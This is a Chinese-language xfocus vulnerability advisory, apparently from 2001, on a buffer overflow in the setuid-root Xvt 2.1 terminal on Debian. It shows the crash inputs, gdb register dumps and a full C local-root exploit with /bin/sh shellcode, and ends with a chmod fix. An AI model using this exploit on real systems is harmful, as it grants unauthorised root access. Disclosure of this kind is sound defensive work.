xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Xvt 2.1 存在缓冲溢出漏洞


发布时间:2001-07-03
更新时间:2001-07-03
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Xvt 2.1-Debian
详细描述
Xvt是X模拟终端,设计用来兼容XTERM,并可以节省交换空间,可以到
下面的地址获得:http://packages.debian.org/stable/x11/xvt.html

通过传递超长的参数给xvt的-T和-name命令行选项,会造成缓冲溢出,由于
xvt会以SETUID ROOT身份安装,所以导致本地ROOT权利的获得。

测试代码
$ ls -l /usr/bin/X11/xvt
-rwsr-xr-x 1 root root 50288 Mar 26 2000 /usr/bin/X11/xvt



$ xvt -V
xvt version 2.1




A) xvt -name <buffer>



$ xvt -name `perl -e 'print "A"x234'`
Segmentation fault (core dumped)
$


tshaw:~$ gdb --core core
GNU gdb 5.0
<snip>
Core was generated by `xvt -name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)




B) xvt -T <buffer>



$ xvt -T `perl -e 'print "A"x262'`
Segmentation fault (core dumped)
$


$ gdb --core core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
<snip>
Core was generated by `xvt -T
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x804b043 in ?? ()
(gdb) where
#0 0x804b043 in ?? ()
#1 0x804c075 in ?? ()
#2 0x804b4f6 in ?? ()
#3 0x804a19c in ?? ()
(gdb) info reg
eax 0x8004100 134234368
ecx 0xffffffff -1
edx 0x805524f 134566479
ebx 0x8055148 134566216
esp 0xbfffdea0 0xbfffdea0
ebp 0xbfffdeac 0xbfffdeac
esi 0x8004141 134234433
edi 0x8004141 134234433
eip 0x804b043 0x804b043
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)




----] proof of exploited code



--- expl.c ---


/*


   /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.


   tshaw:~$ ./expl
   bash#


*/


#include <stdio.h>
#include <stdlib.h>


int main()


{


    char buf[234];
    int i;


    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";



    for(i=0; i<76; i++)
        buf[i] = 0x41;


    *(long *)&buf[76]=0xbffffab0; /* ret addr */


    memset(buf + 80, 0x90, 234);
    memcpy(buf + 233 - strlen(code), code, strlen(code));


    buf[234] = '\0';


    execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);


}


--- expl.c ---

解决方案
# chmod u-s /usr/bin/X11/xvt

相关信息
Samuel Dralet samuel.dralet@mastersecurity.fr
Tufqi tuf@mmania.com
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved